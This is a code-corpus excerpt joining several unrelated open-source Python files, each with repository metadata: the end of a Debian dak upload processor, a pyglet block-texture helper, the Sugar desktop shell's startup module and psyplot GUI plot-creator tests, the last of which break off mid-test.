        except IOError as e:
            if e.errno in (errno.EACCES, errno.EAGAIN):
                utils.fubar("Couldn't obtain lock; assuming another 'dak process-upload' is already running.")
            else:
                raise
        # Initialise UrgencyLog() - it will deal with the case where we don't
        # want to log urgencies
        urgencylog = UrgencyLog()
    Logger = daklog.Logger("process-upload", Options["No-Action"])
    # If we have a directory flag, use it to find our files
    if cnf["Dinstall::Options::Directory"] != "":
        # Note that we clobber the list of files we were given in this case
        # so warn if the user has done both
        if len(changes_files) > 0:
            utils.warn("Directory provided so ignoring files given on command line")
        changes_files = utils.get_changes_files(cnf["Dinstall::Options::Directory"])
        Logger.log(["Using changes files from directory", cnf["Dinstall::Options::Directory"], len(changes_files)])
    elif not len(changes_files) > 0:
        utils.fubar("No changes files given and no directory specified")
    else:
        Logger.log(["Using changes files from command-line", len(changes_files)])
    process_changes(changes_files)
    # Print a human-readable summary of what happened.
    if summarystats.accept_count:
        sets = "set"
        if summarystats.accept_count > 1:
            sets = "sets"
        print "Installed %d package %s, %s." % (summarystats.accept_count, sets,
                                                utils.size_type(int(summarystats.accept_bytes)))
        Logger.log(["total", summarystats.accept_count, summarystats.accept_bytes])
    if summarystats.reject_count:
        sets = "set"
        if summarystats.reject_count > 1:
            sets = "sets"
        print "Rejected %d package %s." % (summarystats.reject_count, sets)
        Logger.log(["rejected", summarystats.reject_count])
    if not Options["No-Action"]:
        urgencylog.close()
    Logger.close()
###############################################################################
# Script entry point.
if __name__ == '__main__':
    main()
|
purism/pdak
|
dak/process_upload.py
|
Python
|
gpl-2.0
| 20,073
|
from pyglet.graphics import TextureGroup
from pyglet import image
from pyglet.gl import *
# Module-level GL state: enable back-face culling and nearest-neighbour
# texture filtering (keeps block textures pixelated instead of blurred).
glEnable(GL_CULL_FACE)
glTexParameteri(GL_TEXTURE_2D, GL_TEXTURE_MIN_FILTER, GL_NEAREST)
glTexParameteri(GL_TEXTURE_2D, GL_TEXTURE_MAG_FILTER, GL_NEAREST)
# Default texture shared by all NewBlock faces.
# NOTE(review): backslash path is Windows-only; os.path.join would be portable.
tex = TextureGroup(image.load('modules\\icon.png').get_texture())
class NewBlock(object):
    """A block definition holding default attributes.

    Instances are normally created via NewFBlock/NewPBlock, which overwrite
    these defaults.
    """
    def __init__(self):
        self.name= "Unnamed Block"
        self.strength = 1
        self.hardness = 1
        self.flammable = False
        # One texture per face; all default to the shared module icon texture.
        self.north = tex
        self.south = tex
        self.east = tex
        self.west = tex
        self.top = tex
        self.bottom = tex
        self.behavior = False
        self.tool = None
def NewFBlock(n, w, s, h, tt, tb, tn, ts, te, tw, f, b):
    """Build a block with a distinct texture per face.

    n: display name; w: required tool; s: strength; h: hardness;
    tt/tb: top/bottom textures; tn/ts/te/tw: side textures;
    f: flammable flag; b: behavior flag.
    Returns the fully configured NewBlock instance.
    """
    blk = NewBlock()
    blk.name, blk.tool = n, w
    blk.strength, blk.hardness = s, h
    blk.top, blk.bottom = tt, tb
    blk.north, blk.south, blk.east, blk.west = tn, ts, te, tw
    blk.flammable, blk.behavior = f, b
    return blk
def NewPBlock(n, w, s, h, t, f):
    """Build a plain block showing the same texture *t* on all six faces.

    n: display name; w: required tool; s: strength; h: hardness;
    f: flammable flag.  Returns the configured NewBlock instance.
    """
    blk = NewBlock()
    blk.name = n
    blk.tool = w
    blk.strength = s
    blk.hardness = h
    # Every face gets the single shared texture.
    for face in ('north', 'south', 'east', 'west', 'top', 'bottom'):
        setattr(blk, face, t)
    blk.flammable = f
    return blk
def Texture(f):
    """Load image file *f* and return it wrapped in a pyglet TextureGroup."""
    glEnable(GL_CULL_FACE)  # re-assert culling + nearest filtering per load
    glTexParameteri(GL_TEXTURE_2D, GL_TEXTURE_MIN_FILTER, GL_NEAREST)
    glTexParameteri(GL_TEXTURE_2D, GL_TEXTURE_MAG_FILTER, GL_NEAREST)
    return TextureGroup(image.load(f).get_texture())
def NewBL(m, i):
    """Return a new BL identifier with mod *m* and block id *i*.

    Bug fix: the original did ``b = BL`` (binding the BL *class*, not an
    instance), so every call mutated shared class attributes and all
    callers saw the same mod/id.  Instantiate instead.
    """
    b = BL()
    b.mod = m
    b.id = i
    # Debug trace kept from the original; parenthesized so the line is
    # valid under both Python 2 and Python 3.
    print (b.id)
    return b
class BL(object):
    """Identifier pair for a block type: owning mod and numeric block id."""

    def __init__(self):
        # Both ids default to zero until assigned by the caller.
        self.mod = self.id = 0
|
SVRobots/Minecraft
|
modules/api.py
|
Python
|
gpl-2.0
| 1,424
|
# Copyright (C) 2006, Red Hat, Inc.
# Copyright (C) 2009, One Laptop Per Child Association Inc
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA
from sugar3 import logger
logger.cleanup()
logger.start('shell')
import logging
logging.debug('STARTUP: Starting the shell')
import os
import sys
import subprocess
import shutil
# Change the default encoding to avoid UnicodeDecodeError
# http://lists.sugarlabs.org/archive/sugar-devel/2012-August/038928.html
reload(sys)
sys.setdefaultencoding('utf-8')
import gettext
from dbus.mainloop.glib import DBusGMainLoop
DBusGMainLoop(set_as_default=True)
from gi.repository import Gio
from gi.repository import GLib
from gi.repository import Gtk
from gi.repository import Gst
from gi.repository import Wnck
from sugar3 import env
from jarabe.model.session import get_session_manager
from jarabe.model.update import updater
from jarabe.model import screen
from jarabe.view import keyhandler
from jarabe.view import gesturehandler
from jarabe.view import cursortracker
from jarabe.journal import journalactivity
from jarabe.model import notifications
from jarabe.model import filetransfer
from jarabe.view import launcher
from jarabe.model import keyboard
from jarabe.desktop import homewindow
from jarabe import config
from jarabe.model.sound import sound
from jarabe import intro
from jarabe.intro.window import IntroWindow
from jarabe.intro.window import create_profile_with_nickname
from jarabe import frame
from jarabe.view.service import UIService
from jarabe import apisocket
from jarabe import testrunner
# Handle of the metacity subprocess started by _start_window_manager().
_metacity_process = None
# True once a window manager was detected and configured.
_window_manager_started = False
# True once _begin_desktop_startup() has run (intro finished or skipped).
_starting_desktop = False
def unfreeze_dcon_cb():
    """Idle callback: unfreeze the OLPC display controller (DCON)."""
    logging.debug('STARTUP: unfreeze_dcon_cb')
    screen.set_dcon_freeze(0)
def setup_frame_cb():
    """Idle callback: instantiate the frame view."""
    logging.debug('STARTUP: setup_frame_cb')
    frame.get_view()
def setup_keyhandler_cb():
    """Idle callback: hook the global key handler onto the frame view."""
    logging.debug('STARTUP: setup_keyhandler_cb')
    keyhandler.setup(frame.get_view())
def setup_gesturehandler_cb():
    """Idle callback: hook the gesture handler onto the frame view."""
    logging.debug('STARTUP: setup_gesturehandler_cb')
    gesturehandler.setup(frame.get_view())
def setup_cursortracker_cb():
    """Idle callback: start the cursor tracker."""
    logging.debug('STARTUP: setup_cursortracker_cb')
    cursortracker.setup()
def setup_journal_cb():
    """Idle callback: start the Journal activity."""
    logging.debug('STARTUP: setup_journal_cb')
    journalactivity.start()
def setup_notification_service_cb():
    """Idle callback: initialise the notification service."""
    notifications.init()
def setup_file_transfer_cb():
    """Idle callback: initialise the file-transfer model."""
    filetransfer.init()
def setup_window_manager():
    """Ask metacity (via metacity-message) to stay out of Sugar's way."""
    logging.debug('STARTUP: window_manager')
    # Each entry: (shell command, warning to log when the command fails).
    commands = (
        ('metacity-message disable-keybindings',
         'Can not disable metacity keybindings'),
        ('metacity-message disable-mouse-button-modifiers',
         'Can not disable metacity mouse button modifiers'),
    )
    for command, warning in commands:
        if subprocess.call(command, shell=True):
            logging.warning(warning)
def __window_manager_changed_cb(screen):
    """Wnck 'window-manager-changed' handler: re-check for a running WM."""
    _check_for_window_manager(screen)
def _complete_desktop_startup():
    """Finish bringing up the desktop once the window manager is running."""
    launcher.setup()
    # Defer the heavier pieces to idle callbacks so the desktop appears
    # fast; the order of the idle_add calls defines their execution order.
    GLib.idle_add(setup_frame_cb)
    GLib.idle_add(setup_keyhandler_cb)
    GLib.idle_add(setup_gesturehandler_cb)
    GLib.idle_add(setup_journal_cb)
    GLib.idle_add(setup_notification_service_cb)
    GLib.idle_add(setup_file_transfer_cb)
    # Kick off the software-update check on a 600 s timer.
    GLib.timeout_add_seconds(600, updater.startup_periodic_update)
    apisocket.start()
    testrunner.check_environment()
def _check_for_window_manager(screen):
    """If a window manager is now running, configure it and continue startup.

    Called both directly after spawning metacity and from the Wnck
    'window-manager-changed' signal; returns early while no WM is up yet.
    """
    global _window_manager_started
    if screen.get_window_manager_name() is None:
        # No WM yet -- wait for another 'window-manager-changed' signal.
        return
    screen.disconnect_by_func(__window_manager_changed_cb)
    setup_window_manager()
    _window_manager_started = True
    if _starting_desktop:
        _complete_desktop_startup()
def _start_window_manager():
    """Launch metacity and watch for it to become the active WM."""
    global _metacity_process
    settings = Gio.Settings.new('org.gnome.desktop.interface')
    settings.set_string('cursor-theme', 'sugar')
    _metacity_process = subprocess.Popen(['metacity', '--no-force-fullscreen'])
    # NOTE: local 'screen' (Wnck) shadows the imported jarabe.model.screen.
    screen = Wnck.Screen.get_default()
    screen.connect('window-manager-changed', __window_manager_changed_cb)
    _check_for_window_manager(screen)
def _stop_window_manager():
    """Terminate the metacity process spawned by _start_window_manager()."""
    _metacity_process.terminate()
def _begin_desktop_startup():
    """Start the session and show the home window (WM may not be up yet)."""
    global _starting_desktop
    _starting_desktop = True
    UIService()
    session_manager = get_session_manager()
    session_manager.start()
    # open homewindow before window_manager to let desktop appear fast
    home_window = homewindow.get_instance()
    home_window.show()
def __intro_window_done_cb(window):
    """'done' handler of the intro window: proceed with desktop startup."""
    _begin_desktop_startup()
    global _window_manager_started
    if _window_manager_started:
        _complete_desktop_startup()
def cleanup_temporary_files():
    """Purge the profile's 'data' directory of temporary files.

    Cleanup is best-effort: failures (e.g. full or read-only disk) are
    reported but must never prevent sugar from starting.
    """
    try:
        # Remove temporary files. See http://bugs.sugarlabs.org/ticket/1876
        data_dir = os.path.join(env.get_profile_path(), 'data')
        shutil.rmtree(data_dir, ignore_errors=True)
        os.makedirs(data_dir)
    except OSError as e:
        # 'as' syntax (Py2.6+) replaces the Py2-only 'except OSError, e';
        # parenthesized print is valid under both Python 2 and 3.
        print('temporary files cleanup failed: %s' % e)
def _migrate_journal_mimeregistry():
    """Copy the Journal's GConf mime-type defaults into GSettings.

    Reads every entry under /desktop/sugar/journal/defaults (including
    sub-directories, see below) and stores them as an 'a{ss}' variant in
    org.sugarlabs.journal 'mime-registry'.
    """
    from gi.repository import GConf
    client = GConf.Client.get_default()
    # Now this isn't good:
    # keys in /desktop/sugar/journal/defaults are mime types
    # which are of the sort text/plain,
    # so GConf thinks 'text' is a directory and the key is 'plain'
    # while the key should be 'text/plain'
    gconf_defaults_dir = '/desktop/sugar/journal/defaults'
    entries = client.all_entries(gconf_defaults_dir)
    for directory in client.all_dirs(gconf_defaults_dir):
        entries.extend(client.all_entries(directory))
    prefix = gconf_defaults_dir + '/'
    prefix_length = len(prefix)
    gconf_defaults = {}
    for entry in entries:
        # Strip the GConf directory prefix to recover the mime-type key.
        key = entry.get_key()
        key = key[prefix_length:]
        # entry.get_value().get_string() causes sugar to crash later
        # not on the call, but after some random time
        # was impossible to debug (almost impossible)
        value = entry.value.get_string()
        gconf_defaults[key] = value
    variant = GLib.Variant('a{ss}', gconf_defaults)
    settings = Gio.Settings('org.sugarlabs.journal')
    settings.set_value('mime-registry', variant)
def _migrate_homeviews_settings():
    """Merge the GConf home-view keys into the GSettings 'homeviews' list.

    view-icons, favorites_layout* and favorite-icons were separate GConf
    keys; they are combined into one 'aa{ss}' variant, one dict per view,
    padded with defaults where the old keys disagree in length.
    """
    from gi.repository import GConf
    client = GConf.Client.get_default()
    # Merge several keys into one... yay!
    options = client.get('/desktop/sugar/desktop/view-icons')
    gconf_view_icons = []
    if options:
        gconf_view_icons = [gval.get_string() for gval in options.get_list()]
    # assume view-icons is the leading key
    number_of_views = len(gconf_view_icons)
    layouts = []
    prefix = '/desktop/sugar/desktop/favorites_layout'
    entries = client.all_entries('/desktop/sugar/desktop')
    for entry in entries:
        key = entry.get_key()
        if key.startswith(prefix):
            # entry.get_value().get_string() causes sugar to crash later
            # not on the call, but after some random time
            # was impossible to debug (almost impossible)
            value = entry.value.get_string()
            layouts.append((key, value))
    # Sort by key so layouts line up with their view index.
    layouts.sort()
    gconf_layouts = [layout[1] for layout in layouts][:number_of_views]
    # Pad with the default layout so every view has one.
    while len(gconf_layouts) < number_of_views:
        gconf_layouts.append('ring-layout')
    options = client.get('/desktop/sugar/desktop/favorite-icons')
    gconf_fav_icons = []
    if options:
        gconf_fav_icons = [gval.get_string() for gval in options.get_list()]
    gconf_fav_icons = gconf_fav_icons[:number_of_views]
    while len(gconf_fav_icons) < number_of_views:
        gconf_fav_icons.append('emblem-favorite')
    homeviews = []
    for i, view_icon in enumerate(gconf_view_icons):
        homeviews.append({'view-icon': view_icon, 'layout': gconf_layouts[i],
                          'favorite-icon': gconf_fav_icons[i]})
    variant = GLib.Variant('aa{ss}', homeviews)
    settings = Gio.Settings('org.sugarlabs.desktop')
    settings.set_value('homeviews', variant)
def _migrate_gconf_to_gsettings():
    """One-time migration of GConf settings to GSettings.

    Runs the stock converter first, then migrates the sugar-specific keys
    that gsettings-data-convert cannot handle, guarded by the
    'gsettings-migrated' flag so the custom migration only happens once.
    """
    try:
        # check_call (not call) so a non-zero exit status actually raises
        # CalledProcessError; subprocess.call() never raises it, which
        # made the handler below dead code.
        subprocess.check_call('gsettings-data-convert')
    except subprocess.CalledProcessError:
        logging.error('Unable to convert data.')
    settings = Gio.Settings('org.sugarlabs')
    migrated = settings.get_boolean('gsettings-migrated')
    if not migrated:
        _migrate_journal_mimeregistry()
        _migrate_homeviews_settings()
        settings.set_boolean('gsettings-migrated', True)
def setup_locale():
    """Bind the gettext domains and export the configured timezone."""
    # NOTE: This needs to happen early because some modules register
    # translatable strings in the module scope.
    gettext.bindtextdomain('sugar', config.locale_path)
    gettext.bindtextdomain('sugar-toolkit-gtk3', config.locale_path)
    gettext.textdomain('sugar')
    settings = Gio.Settings('org.sugarlabs.date')
    timezone = settings.get_string('timezone')
    # Only override TZ when the user actually configured a timezone.
    if timezone is not None and timezone:
        os.environ['TZ'] = timezone
def setup_fonts():
    """Apply the user's configured default font face and size to GTK."""
    settings = Gio.Settings('org.sugarlabs.font')
    face = settings.get_string('default-face')
    size = settings.get_double('default-size')
    settings = Gtk.Settings.get_default()
    settings.set_property("gtk-font-name", "%s %f" % (face, size))
def setup_theme():
    """Select the sugar GTK/icon theme, scaled per SUGAR_SCALING."""
    # sugar-72 is the default; switch to sugar-100 at 100% scaling.
    sugar_theme = 'sugar-72'
    if os.environ.get('SUGAR_SCALING') == '100':
        sugar_theme = 'sugar-100'
    settings = Gtk.Settings.get_default()
    settings.set_property('gtk-theme-name', sugar_theme)
    settings.set_property('gtk-icon-theme-name', 'sugar')
    # Make sugar's own icons visible to the icon theme lookup.
    icons_path = os.path.join(config.data_path, 'icons')
    Gtk.IconTheme.get_default().append_search_path(icons_path)
def _start_intro(start_on_age_page=False):
    """Show the first-boot intro window; startup continues on its 'done'."""
    window = IntroWindow(start_on_age_page=start_on_age_page)
    window.connect('done', __intro_window_done_cb)
    window.show()
def _check_profile():
    """Return True when a usable profile exists (creating one if possible).

    Falls back to creating a profile from the SUGAR_PROFILE_NAME
    environment variable when no profile is present yet.
    """
    if intro.check_profile():
        return True
    profile_name = os.environ.get("SUGAR_PROFILE_NAME")
    if profile_name is None:
        return False
    create_profile_with_nickname(profile_name)
    return True
def _check_group_label():
    """Thin wrapper around intro.check_group_label()."""
    return intro.check_group_label()
def main():
    """Shell entry point: migrate settings, start the WM and the desktop.

    The call order below matters: settings migration and cleanup run
    before the window manager, and the unfreeze idle callback is queued
    before any potentially blocking intro screen.
    """
    # This can be removed once pygobject-3.10 is a requirement.
    # https://bugzilla.gnome.org/show_bug.cgi?id=686914
    GLib.threads_init()
    Gst.init(sys.argv)
    _migrate_gconf_to_gsettings()
    cleanup_temporary_files()
    _start_window_manager()
    setup_locale()
    setup_fonts()
    setup_theme()
    # this must be added early, so that it executes and unfreezes the screen
    # even when we initially get blocked on the intro screen
    GLib.idle_add(unfreeze_dcon_cb)
    GLib.idle_add(setup_cursortracker_cb)
    sound.restore()
    keyboard.setup()
    sys.path.append(config.ext_path)
    # No profile -> full intro; profile but no group label -> age page only.
    if not _check_profile():
        _start_intro()
    elif not _check_group_label():
        _start_intro(start_on_age_page=True)
    else:
        _begin_desktop_startup()
    try:
        Gtk.main()
    except KeyboardInterrupt:
        print 'Ctrl+C pressed, exiting...'
    _stop_window_manager()
# Executed at import time: this module is the shell's entry script.
main()
|
puneetgkaur/backup_sugar_shell_for_cordova
|
src/jarabe/main.py
|
Python
|
gpl-2.0
| 11,951
|
# -*- coding: utf-8 -*-
"""Skript to test the InProcessShell that is used in the psyplot gui"""
import sys
import six
import unittest
from itertools import chain
import _base_testing as bt
import psyplot.project as psy
from psyplot.compat.pycompat import range
from psyplot_gui.compat.qtcompat import (
QTest, Qt, QStyleOptionViewItem, QWidget, QValidator, QtGui, QtCore,
asstring)
class PlotCreatorTest(bt.PsyPlotGuiTestCase):
    """Tests concerning the plot creator"""
    def setUp(self):
        """Open a fresh plot-creator dialog for every test."""
        super(PlotCreatorTest, self).setUp()
        self.window.new_plots()
        self.pc = self.window.plot_creator
    def tearDown(self):
        """Close any dataset opened by the test and the dialog itself."""
        if getattr(self.pc, 'ds', None) is not None:
            self.pc.ds.close()
        # make sure the plot creator is closed completely
        self.pc.close()
        del self.pc
        super(PlotCreatorTest, self).tearDown()
    def test_load_external_file(self):
        """Test whether an external netCDF file can be loaded"""
        fname = self.get_file('test-t2m-u-v.nc')
        self.pc.open_dataset([fname])
        vtab = self.pc.variables_table
        ds = psy.open_dataset(fname)
        self.assertIn(fname, self.pc.ds_combo.currentText())
        # The variables table must list exactly the non-coordinate variables.
        self.assertEqual(
            {asstring(vtab.item(irow, 0).text()) for irow in range(
                vtab.rowCount())},
            set(ds.variables) - set(ds.coords))
        ds.close()
    def test_load_from_console(self):
        """Test whether a dataset can be loaded that is defined in the
        console"""
        fname = self.get_file('test-t2m-u-v.nc')
        if sys.platform == 'win32':
            # Escape backslashes for the string passed to the console.
            fname = fname.replace('\\', '\\\\')
        self.window.console.execute(
            "ds = psy.open_dataset('%s')" % fname)
        vtab = self.pc.variables_table
        ds = psy.open_dataset(self.get_file('test-t2m-u-v.nc'))
        self.pc.bt_get_ds.get_from_shell('ds')
        self.assertIn('ds', self.pc.ds_combo.currentText())
        self.assertEqual(
            {asstring(vtab.item(irow, 0).text()) for irow in range(
                vtab.rowCount())},
            set(ds.variables) - set(ds.coords))
        ds.close()
        self.window.console.execute("ds.close()")
    def test_plusplus(self):
        """Test the add all button"""
        # load a dataset
        self.test_load_external_file()
        QTest.mouseClick(self.pc.bt_add_all, Qt.LeftButton)
        atab = self.pc.array_table
        vtab = self.pc.variables_table
        self.assertEqual(
            [asstring(atab.item(irow, 0).text()) for irow in range(
                atab.rowCount())],
            [asstring(vtab.item(irow, 0).text()) for irow in range(
                vtab.rowCount())])
    def test_minusminus(self):
        """Test the remove all button"""
        self.test_plusplus()
        QTest.mouseClick(self.pc.bt_remove_all, Qt.LeftButton)
        self.assertEqual(self.pc.array_table.rowCount(), 0)
    def test_plus(self):
        """Test the add button"""
        self.test_load_external_file()
        vtab = self.pc.variables_table
        atab = self.pc.array_table
        nvar = vtab.rowCount()
        # select the last two variables and add only those
        rows = [nvar - 2, nvar - 1]
        for row in rows:
            vtab.item(row, 0).setSelected(True)
        QTest.mouseClick(self.pc.bt_add, Qt.LeftButton)
        self.assertEqual(
            [asstring(atab.item(irow, 0).text()) for irow in range(
                atab.rowCount())],
            [asstring(vtab.item(irow, 0).text()) for irow in rows])
    def test_minus(self):
        """Test the minus button"""
        self.test_plusplus()
        vtab = self.pc.variables_table
        atab = self.pc.array_table
        nvar = atab.rowCount()
        # select the last two arrays and remove only those
        rows = [nvar - 2, nvar - 1]
        for row in rows:
            atab.item(row, 0).setSelected(True)
        QTest.mouseClick(self.pc.bt_remove, Qt.LeftButton)
        variables = [asstring(vtab.item(row, 0).text())
                     for row in range(vtab.rowCount()) if row not in rows]
        self.assertEqual(
            [asstring(atab.item(irow, 0).text()) for irow in range(
                atab.rowCount())],
            variables)
    def test_update_with_dims(self):
        """Test the update with the given dimensions"""
        self.test_plusplus()
        atab = self.pc.array_table
        atab.selectAll()
        atab.update_selected(dims={'time': '3'})
        icol = len(atab.desc_cols) + atab.dims.index('time')
        # only variables that actually have a 'time' dimension are checked
        vars3d = {var for var, varo in atab.get_ds().variables.items()
                  if 'time' in varo.dims}
        for irow in range(atab.rowCount()):
            vname = atab.item(irow, atab.var_col).text()
            if vname in vars3d:
                item = atab.item(irow, icol)
                self.assertEqual(
                    item.text(), '3',
                    msg='Wrong time value %s in row %s' % (
                        item.text(), irow))
    def test_add_subplots(self):
        """Test the add subplots button"""
        from math import ceil
        import matplotlib.pyplot as plt
        self.test_load_external_file()
        self.test_plusplus()
        # 2x2 grid but at most 3 axes per figure
        self.pc.cols_axis_edit.setText('2')
        self.pc.rows_axis_edit.setText('2')
        self.pc.max_axis_edit.setText('3')
        QTest.mouseClick(self.pc.bt_add_axes, Qt.LeftButton)
        nvar = self.pc.array_table.rowCount()
        nfigs = int(ceil(nvar / 3.))
        # create the subplots
        axes = self.pc.array_table.axes
        self.assertEqual([ax.numCols for ax in axes], [2] * nvar)
        self.assertEqual([ax.numRows for ax in axes], [2] * nvar)
        rows = [0, 0, 1] * nfigs
        cols = [0, 1, 0] * nfigs
        self.assertEqual([ax.rowNum for ax in axes], rows)
        self.assertEqual([ax.colNum for ax in axes], cols)
        fig_nums = list(chain(*([i] * 3 for i in range(1, nfigs + 1))))
        self.assertEqual([ax.get_figure().number for ax in axes], fig_nums)
        plt.close('all')
    def test_add_single_subplots(self):
        """Test the add single subplot button"""
        import matplotlib.pyplot as plt
        self.test_load_external_file()
        self.test_plusplus()
        # same subplot position (row 1, col 2) on a new figure per array
        self.pc.cols_axis_edit.setText('2')
        self.pc.rows_axis_edit.setText('2')
        self.pc.row_axis_edit.setText('1')
        self.pc.col_axis_edit.setText('2')
        self.pc.array_table.selectAll()
        QTest.mouseClick(self.pc.bt_add_single_axes, Qt.LeftButton)
        nvar = self.pc.array_table.rowCount()
        # create the subplots
        axes = self.pc.array_table.axes
        # test rows, cols and figure numbers
        self.assertEqual([ax.numCols for ax in axes], [2] * nvar)
        self.assertEqual([ax.numRows for ax in axes], [2] * nvar)
        self.assertEqual([ax.rowNum for ax in axes], [0] * nvar)
        self.assertEqual([ax.colNum for ax in axes], [1] * nvar)
        self.assertEqual([ax.get_figure().number for ax in axes], list(
            range(1, nvar + 1)))
        plt.close('all')
    def test_axescreator_subplots(self):
        """Test the :class:`psyplot_gui.plot_creator.SubplotCreator`"""
        import matplotlib.pyplot as plt
        from psyplot_gui.plot_creator import AxesCreatorCollection
        # load dataset
        self.test_load_external_file()
        # create arrays
        self.test_plusplus()
        # use all items
        atab = self.pc.array_table
        items = [atab.item(i, atab.axes_col) for i in range(atab.rowCount())]
        # create the widget to select the subplots
        ac = AxesCreatorCollection('subplot')
        w = ac.tb.currentWidget()
        w.fig_edit.setText('')
        w.cols_edit.setText('2')
        w.rows_edit.setText('2')
        w.num1_edit.setText('2')
        w.num2_edit.setText('2')
        ac.okpressed.connect(lambda it: atab._change_axes(items, it))
        QTest.mouseClick(ac.bt_ok, Qt.LeftButton)
        nvar = self.pc.array_table.rowCount()
        # create the subplots
        axes = self.pc.array_table.axes
        # test rows, cols and figure numbers
        self.assertEqual([ax.numCols for ax in axes], [2] * nvar)
        self.assertEqual([ax.numRows for ax in axes], [2] * nvar)
        self.assertEqual([ax.rowNum for ax in axes], [0] * nvar)
        self.assertEqual([ax.colNum for ax in axes], [1] * nvar)
        self.assertEqual([ax.get_figure().number for ax in axes], list(
            range(1, nvar + 1)))
        # close figures
        plt.close('all')
    def test_axescreator_axes(self):
        """Test the :class:`psyplot_gui.plot_creator.AxesCreator`"""
        import matplotlib.pyplot as plt
        from psyplot_gui.plot_creator import AxesCreatorCollection
        # load dataset
        self.test_load_external_file()
        # create arrays
        self.test_plusplus()
        # use all items
        atab = self.pc.array_table
        items = [atab.item(i, atab.axes_col) for i in range(atab.rowCount())]
        # create the widget to select the subplots
        ac = AxesCreatorCollection('axes')
        w = ac.tb.currentWidget()
        w.fig_edit.setText('')
        w.x0_edit.setText('0.3')
        w.y0_edit.setText('0.4')
        w.x1_edit.setText('0.7')
        w.y1_edit.setText('0.8')
        ac.okpressed.connect(lambda it: atab._change_axes(items, it))
        QTest.mouseClick(ac.bt_ok, Qt.LeftButton)
        nvar = self.pc.array_table.rowCount()
        # create the subplots
        axes = self.pc.array_table.axes
        boxes = [ax.get_position() for ax in axes]
        # test rows, cols and figure numbers
        self.assertEqual([box.x0 for box in boxes], [0.3] * nvar)
        self.assertEqual([box.y0 for box in boxes], [0.4] * nvar)
        self.assertEqual([box.x1 for box in boxes], [0.7] * nvar)
        self.assertEqual([box.y1 for box in boxes], [0.8] * nvar)
        self.assertEqual([ax.get_figure().number for ax in axes], list(
            range(1, nvar + 1)))
        # close figures
        plt.close('all')
    def test_axescreator_select(self):
        """Test the :class:`psyplot_gui.plot_creator.AxesSelector`"""
        import matplotlib.pyplot as plt
        import numpy as np
        from matplotlib.backend_bases import MouseEvent, PickEvent
        from psyplot_gui.plot_creator import AxesCreatorCollection
        # load dataset
        self.test_load_external_file()
        # create arrays
        self.test_plusplus()
        # use all items
        atab = self.pc.array_table
        items = [atab.item(i, atab.axes_col) for i in range(2)]
        # create the widget to select the subplots
        ax1 = plt.axes([0.3, 0.4, 0.6, 0.3])
        plt.figure()
        ax2 = plt.subplot(211)
        ac = AxesCreatorCollection('choose')
        w = ac.tb.currentWidget()
        # simulate picking each axes at its center
        fig = ax1.get_figure()
        mouseevent1 = MouseEvent(
            'button_release_event', fig.canvas,
            *np.mean(ax1.get_position().get_points().T, axis=1))
        w.get_picked_ax(PickEvent('pick', fig.canvas, mouseevent1, artist=ax1))
        fig = ax2.get_figure()
        mouseevent2 = MouseEvent(
            'button_release_event', ax2.get_figure().canvas,
            *np.mean(ax2.get_position().get_points().T, axis=1))
        w.get_picked_ax(PickEvent('pick', fig.canvas, mouseevent2, artist=ax2))
        ac.okpressed.connect(lambda it: atab._change_axes(items, it))
        QTest.mouseClick(ac.bt_ok, Qt.LeftButton)
        # create the subplots
        axes = self.pc.array_table.axes
        # check them
        self.assertIs(axes[0], ax1)
        self.assertIs(axes[1], ax2)
        # close figures
        plt.close('all')
    def test_arrayname_validator(self):
        """Test the :class:`psyplot_gui.plot_creator.ArrayNameValidator`"""
        # open dataset
        fname = self.get_file('test-t2m-u-v.nc')
        ds = psy.open_dataset(fname)
        self.pc.bt_get_ds.get_from_shell(ds)
        # add data arrays
        QTest.mouseClick(self.pc.bt_add_all, Qt.LeftButton)
        # get names
        atab = self.pc.array_table
        names = atab.current_names
        # get itemdelegate
        item_delegate = atab.itemDelegateForColumn(atab.arr_col)
        # create editor and validator
        widget = QWidget()
        option = QStyleOptionViewItem()
        index = atab.indexFromItem(atab.item(0, atab.arr_col))
        editor = item_delegate.createEditor(widget, option, index)
        validator = editor.validator()
        # check validation: an existing name is only Intermediate, a new
        # name is Acceptable, and fixup() must produce an unused name
        self.assertEqual(validator.validate(names[1], len(names[1]))[0],
                         validator.Intermediate)
        self.assertEqual(validator.validate('dummy', 5)[0],
                         validator.Acceptable)
        self.assertNotIn(validator.fixup(names[1]), names)
        ds.close()
    def test_variablename_validator(self):
        """Test the :class:`psyplot_gui.plot_creator.VariableItemDelegate`"""
        # open dataset
        try:
            from psyplot_gui.compat.qtcompat import QString
        except ImportError:
            QString = six.text_type
        fname = self.get_file('test-t2m-u-v.nc')
        ds = psy.open_dataset(fname)
        self.pc.bt_get_ds.get_from_shell(ds)
        # add data arrays
        QTest.mouseClick(self.pc.bt_add_all, Qt.LeftButton)
        # get names
        atab = self.pc.array_table
        names = sorted(list(set(ds.variables).difference(ds.coords)))
        # get itemdelegate
        item_delegate = atab.itemDelegateForColumn(atab.var_col)
        # create editor and validator
        widget = QWidget()
        option = QStyleOptionViewItem()
        index = atab.indexFromItem(atab.item(0, atab.arr_col))
        editor = item_delegate.createEditor(widget, option, index)
        validator = editor.validator()
        # check validation
        self.assertEqual(validator.validate(QString('dummy'), 5)[0],
                         QValidator.Invalid)
        self.assertEqual(validator.validate(QString(names[0]),
                                            len(names[0]))[0],
                         QValidator.Acceptable)
        self.assertEqual(validator.validate(QString(names[0])[:2], 2)[0],
                         QValidator.Intermediate)
        # multiple valid names joined by the separator are Acceptable
        s = atab.sep.join(names)
        self.assertEqual(validator.validate(QString(s), len(s))[0],
                         QValidator.Acceptable)
        self.assertEqual(
            validator.validate(
                QString(s[:3] + 'dummy' + s[3:]), len(s) + 5)[0],
            QValidator.Invalid)
        ds.close()
    def test_drag_drop(self):
        """Test the drag and drop of the
        :class:`psyplot_gui.plot_creator.ArrayTable`"""
        self.pc.show()
        # XXX Try to use directly the dropEvent method by setting the source of
        # the event!
        point = QtCore.QPoint(0, 0)
        data = QtCore.QMimeData()
        event = QtGui.QDropEvent(point, Qt.MoveAction, data, Qt.LeftButton,
                                 Qt.NoModifier, QtCore.QEvent.Drop)
        # open dataset
